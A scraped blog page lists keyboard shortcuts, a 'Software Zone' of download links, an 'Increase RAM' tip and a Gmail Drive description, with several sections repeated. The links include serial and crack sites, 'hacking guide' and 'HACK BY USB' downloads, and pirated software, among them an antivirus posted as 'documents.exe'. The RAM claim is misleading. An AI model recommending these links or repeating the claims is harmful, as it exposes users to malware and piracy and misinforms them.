* Ctrl + M: Open new message in integrated mail client.
* Ctrl + J: Open Downloads dialog.
* F6: Switch to next frame. You must have selected something on the page already, e.g. by use of Tab.
* Shift + F6: Switch to previous frame.
* Apostrophe ('): Find link as you type.
* Slash (/): Find text as you type.
Gmail Shortcuts
* Note: Must have "keyboard shortcuts" on in settings.
* C: Compose new message.
* Shift + C: Open new window to compose new message.
* Slash (/): Switch focus to search box.
* K: Switch focus to the next most recent email. Enter or "O" opens focused email.
* J: Switch focus to the next oldest email.
* N: Switch focus to the next message in the "conversation." Enter or "O" expands/collapses messages.
* P: Switch focus to the previous message.
* U: Takes you back to the inbox and checks for new mail.
* Y: Various actions depending on current view:
* Has no effect in "Sent" and "All Mail" views.
* Inbox: Archive email or message.
* Starred: Unstar email or message.
* Spam: Unmark as spam and move back to "Inbox."
* Trash: Move back to "Inbox."
* Any label: Remove the label.
* X: "Check" an email. Various actions can be performed against all checked emails.
* S: "Star" an email. Identical to the more familiar term, "flagging."
* R: Reply to the email.
* A: Reply to all recipients of the email.
* F: Forward an email.
* Shift + R: Reply to the email in a new window.
* Shift + A: Reply to all recipients of the email in a new window.
* Shift + F: Forward an email in a new window.
* Shift + 1 (!): Mark an email as spam and remove it from the inbox.
* G then I: Switch to "Inbox" view.
* G then S: Switch to "Starred" view.
* G then A: Switch to "All Mail" view.
* G then C: Switch to "Contacts" view.
* G then S: Switch to "Drafts" view.
List of F1-F9 Key Commands for the Command Prompt
* F1 / right arrow: Repeats the letters of the last command line, one by one.
* F2: Displays a dialog asking user to "enter the char to copy up to" of the last command line
* F3: Repeats the last command line
* F4: Displays a dialog asking user to "enter the char to delete up to" of the last command line
* F5: Goes back one command line
* F6: Enters the traditional CTRL+Z (^z)
* F7: Displays a menu with the command line history
* F8: Cycles back through previous command lines (beginning with most recent)
* F9: Displays a dialog asking user to enter a command number, where 0 is for first command line entered.
* Alt+Enter: toggle full Screen mode.
* up/down: scroll thru/repeat previous entries
* Esc: delete line
* Note: The buffer allows a maximum of 50 command lines. After this number is reached, the first line will be replaced in sequence.
Helpful accessibility keyboard shortcuts
* Switch FilterKeys on and off. Right SHIFT for eight seconds
* Switch High Contrast on and off. Left ALT +left SHIFT +PRINT SCREEN
* Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
* Switch StickyKeys on and off. SHIFT five times
* Switch ToggleKeys on and off. NUM LOCK for five seconds
Software Zone
SAHE BUKHARI SHAREEF 8 PATRS:
1). http://rapidshare.com/files/45959967/ur4389-01.pdf
2). http://rapidshare.com/files/45959917/ur4390-02.pdf
3). http://rapidshare.com/files/45960382/ur4391-03.pdf
4). http://rapidshare.com/files/45960499/ur4392-04.pdf
5). http://rapidshare.com/files/45960517/ur4393-05.pdf
6). http://rapidshare.com/files/45960650/ur4394-06.pdf
7). http://rapidshare.com/files/45960799/ur4395-07.pdf
8). http://rapidshare.com/files/45960811/ur4396-08.pdf
Yahoo 9.0:
http://www.filehippo.com/download_yahoo_messenger/
Live Msn 8.0:
http://www.filehippo.com/download_msn_messenger/
Gtalk:
http://www.filehippo.com/download_google_talk/
I.Explorer 7.0:
http://www.filehippo.com/download_internet_explorer/
AVAST Anti Virus:
http://www.filehippo.com/download_avast_antivirus/
AVG 7.5 Free:
http://www.filehippo.com/download_avg_antivirus/
CC Cleaner 2.3:
http://www.filehippo.com/download_ccleaner/
Recuva 1.9:
http://www.filehippo.com/download_recuva/
NOD32 Antivirus 3.0:
http://www.filehippo.com/download_nod32/
Flash Player 9.0:
http://www.filehippo.com/download_flashplayer_ie/
Download Manager 2.5:
http://www.filehippo.com/download_free_download_manager/
Opera Explorer 9.25:
http://www.filehippo.com/download_opera/
Adobe Reader:
http://www.filehippo.com/download_adobe_acrobat_reader/
WinZip 11.1:
http://www.filehippo.com/download_winzip/
99 search engines:
http://awk.ueuo.com/searchengines/
Listen FM:
http://www.fmsunrise.com/
Birthday SMS :
http://www.atrochatro.com/sms_birthday.html
Serials:
http://serials.ws/index.php
http://www.astalavista.ms/
Media Compresser:
http://www.goldwave.com/mqrelease.php
XP Themes :
http://www.alienware.com/intro_pages/invader.aspx
ORKUT Help :
http://www.orkutrix.com/
ACTIVE SPEED:
http://www.scanyourpc.com/run/click/@754725349787/products/SP/PPC/select_scnpc_ppc_activespeed_int_speedtest_np.html?_kk=windows%20xp%20slow%20internet&_kt=b8ae6723-a717-4c33-a98c-58abccff70ef&theme=select_scnpc_activespeed_download&plan1id=&orderpackage1id=WEBAS1YEAR29&plan1c=&upsell_code=&popuppage=&display=&referredby=@754725349787&loadlink=&c1=2007scnpc_AS_speedtest_google
DOWNLOAD FROM YOUTUBE:
http://www.downloadyoutubevideos.com/
http://javimoya.com/blog/youtube_en.php
Hacking Tutorials :
http://softwarespt.blogspot.com/
http://linuxgazette.net/issue55/williams.html
http://www.programmingtutorials.com/cplusplus.aspx
Hacking Guides:
http://softwarespt.blogspot.com/2007/12/hack-gmail-with-mp3-scrap.html
HACK BY USB:
http://www.mediafire.com/?f3ddzyenlug
Software Recomended for ISA Server
ISA Server 2000 ENTERPRIZE Ed.
http://rapidshare.de/files/25351057/...roxys.rar.html
DU METTER:
http://dl.hageltech.com/DUMeter-Install.exe
Symantec Antivirus Corp. ED. 10:
http://rapidshare.com/files/5243983/documents.exe.html
Sygate personal Firewall:
http://cdrom.wip.digitalriver.com/pu...ws_49/pspf.msi
1). http://rapidshare.com/files/45959967/ur4389-01.pdf
2). http://rapidshare.com/files/45959917/ur4390-02.pdf
3). http://rapidshare.com/files/45960382/ur4391-03.pdf
4). http://rapidshare.com/files/45960499/ur4392-04.pdf
5). http://rapidshare.com/files/45960517/ur4393-05.pdf
6). http://rapidshare.com/files/45960650/ur4394-06.pdf
7). http://rapidshare.com/files/45960799/ur4395-07.pdf
8). http://rapidshare.com/files/45960811/ur4396-08.pdf
Yahoo 9.0:
http://www.filehippo.com/download_yahoo_messenger/
Live Msn 8.0:
http://www.filehippo.com/download_msn_messenger/
Gtalk:
http://www.filehippo.com/download_google_talk/
I.Explorer 7.0:
http://www.filehippo.com/download_internet_explorer/
AVAST Anti Virus:
http://www.filehippo.com/download_avast_antivirus/
AVG 7.5 Free:
http://www.filehippo.com/download_avg_antivirus/
CC Cleaner 2.3:
http://www.filehippo.com/download_ccleaner/
Recuva 1.9:
http://www.filehippo.com/download_recuva/
NOD32 Antivirus 3.0:
http://www.filehippo.com/download_nod32/
Flash Player 9.0:
http://www.filehippo.com/download_flashplayer_ie/
Download Manager 2.5:
http://www.filehippo.com/download_free_download_manager/
Opera Explorer 9.25:
http://www.filehippo.com/download_opera/
Adobe Reader:
http://www.filehippo.com/download_adobe_acrobat_reader/
WinZip 11.1:
http://www.filehippo.com/download_winzip/
99 search engines:
http://awk.ueuo.com/searchengines/
Listen FM:
http://www.fmsunrise.com/
Birthday SMS :
http://www.atrochatro.com/sms_birthday.html
Serials:
http://serials.ws/index.php
http://www.astalavista.ms/
Media Compresser:
http://www.goldwave.com/mqrelease.php
XP Themes :
http://www.alienware.com/intro_pages/invader.aspx
ORKUT Help :
http://www.orkutrix.com/
ACTIVE SPEED:
http://www.scanyourpc.com/run/click/@754725349787/products/SP/PPC/select_scnpc_ppc_activespeed_int_speedtest_np.html?_kk=windows%20xp%20slow%20internet&_kt=b8ae6723-a717-4c33-a98c-58abccff70ef&theme=select_scnpc_activespeed_download&plan1id=&orderpackage1id=WEBAS1YEAR29&plan1c=&upsell_code=&popuppage=&display=&referredby=@754725349787&loadlink=&c1=2007scnpc_AS_speedtest_google
DOWNLOAD FROM YOUTUBE:
http://www.downloadyoutubevideos.com/
http://javimoya.com/blog/youtube_en.php
Hacking Tutorials :
http://softwarespt.blogspot.com/
http://linuxgazette.net/issue55/williams.html
http://www.programmingtutorials.com/cplusplus.aspx
Hacking Guides:
http://softwarespt.blogspot.com/2007/12/hack-gmail-with-mp3-scrap.html
HACK BY USB:
http://www.mediafire.com/?f3ddzyenlug
Software Recomended for ISA Server
ISA Server 2000 ENTERPRIZE Ed.
http://rapidshare.de/files/25351057/...roxys.rar.html
DU METTER:
http://dl.hageltech.com/DUMeter-Install.exe
Symantec Antivirus Corp. ED. 10:
http://rapidshare.com/files/5243983/documents.exe.html
Sygate personal Firewall:
http://cdrom.wip.digitalriver.com/pu...ws_49/pspf.msi
Increase RAM Of Ur Computer
1). Start any application, say Word. Open some large documents.
2). Press CTRL+SHIFT+ESC to open Windows Task Manager and click Processes tab and sort the list in descending order on Mem Usage. You will notice that WINWORD.EXE will be somewhere at the top, using multiple MBs of memory.
3). Now switch to Word and simply minimize it. (Don't use the Minimize All Windows option of the task bar).
4). Now go back to the Windows Task Manager and see where WINWORD.EXE is listed. Most probably you will not find it at the top. You will typically have to scroll to the bottom of the list to find Word. Now check out the amount of RAM it is using. Surprised? The memory utilization has reduced by a huge amount.
5). Minimize each application that you are currently not working on by clicking on the Minimize button & you can increase the amount of available RAM by a substantial margin. Depending upon the number and type of applications you use together, the difference can be as much as 50 percent of extra RAM. In any multitasking system, minimizing an application means that it won't be utilized by the user right now. Therefore, the OS automatically makes the application use virtual memory & keeps bare minimum amounts of the code in physical RAM.
2). Press CTRL+SHIFT+ESC to open Windows Task Manager and click Processes tab and sort the list in descending order on Mem Usage. You will notice that WINWORD.EXE will be somewhere at the top, using multiple MBs of memory.
3). Now switch to Word and simply minimize it. (Don't use the Minimize All Windows option of the task bar).
4). Now go back to the Windows Task Manager and see where WINWORD.EXE is listed. Most probably you will not find it at the top. You will typically have to scroll to the bottom of the list to find Word. Now check out the amount of RAM it is using. Surprised? The memory utilization has reduced by a huge amount.
5). Minimize each application that you are currently not working on by clicking on the Minimize button & you can increase the amount of available RAM by a substantial margin. Depending upon the number and type of applications you use together, the difference can be as much as 50 percent of extra RAM. In any multitasking system, minimizing an application means that it won't be utilized by the user right now. Therefore, the OS automatically makes the application use virtual memory & keeps bare minimum amounts of the code in physical RAM.
Gmail Hard Drive
GMail Drive is a Shell Namespace Extension that creates a virtual drive in the Windows Explorer, allowing you to use your Google Gmail account as a storage medium.
It allows you to do basic file manipulation, such as copy and delete, on files inside the GMail folder. Because it is a Shell Extension, the interface you work in is Windows Explorer itself.
GMail files are physically stored as e-mails on your Google Gmail account. The files are stored in mail attachments, and the filename and file information (such as filesize) is stored in the message subject line.
GMail Drive has already been installed on your computer. All you need to do now, is to browse to the GMail Drive entry under your My Computer folder in the Windows Explorer. (right click on My Computer and click on explore)
After you finished installing this, sign in with your username and password. If you wish to get a gmail account, then go to www.gmail.com and log in with ur gmail id!
This becomes like an external drive just drag and drop in the files u like in the GMail Drive..
Now the amazing thing is that when u drag the any files in the GMail Drive it will show in your email from your e-mail. So it save lot of time to as it is simple drag and drop...
Every Gmail account has a 2GB storage limit. If you have 1 gmail account you can make 50 more. Just do the math, 2 *50 = 100GB of storage space.
Now you dont need a new hard drive
Download Here:
http://www.sendspace.com/file/xc3461
http://www.filehippo.com/download/075b76ecf9f161544c51013aa3d02df2/download/
http://www.filehippo.com/download_gmail_drive/
It allows you to do basic file manipulation, such as copy and delete, on files inside the GMail folder. Because it is a Shell Extension, the interface you work in is Windows Explorer itself.
GMail files are physically stored as e-mails on your Google Gmail account. The files are stored in mail attachments, and the filename and file information (such as filesize) is stored in the message subject line.
GMail Drive has already been installed on your computer. All you need to do now, is to browse to the GMail Drive entry under your My Computer folder in the Windows Explorer. (right click on My Computer and click on explore)
After you finished installing this, sign in with your username and password. If you wish to get a gmail account, then go to www.gmail.com and log in with ur gmail id!
This becomes like an external drive just drag and drop in the files u like in the GMail Drive..
Now the amazing thing is that when u drag the any files in the GMail Drive it will show in your email from your e-mail. So it save lot of time to as it is simple drag and drop...
Every Gmail account has a 2GB storage limit. If you have 1 gmail account you can make 50 more. Just do the math, 2 *50 = 100GB of storage space.
Now you dont need a new hard drive
Download Here:
http://www.sendspace.com/file/xc3461
http://www.filehippo.com/download/075b76ecf9f161544c51013aa3d02df2/download/
http://www.filehippo.com/download_gmail_drive/
Subscribe to:
Posts (Atom)
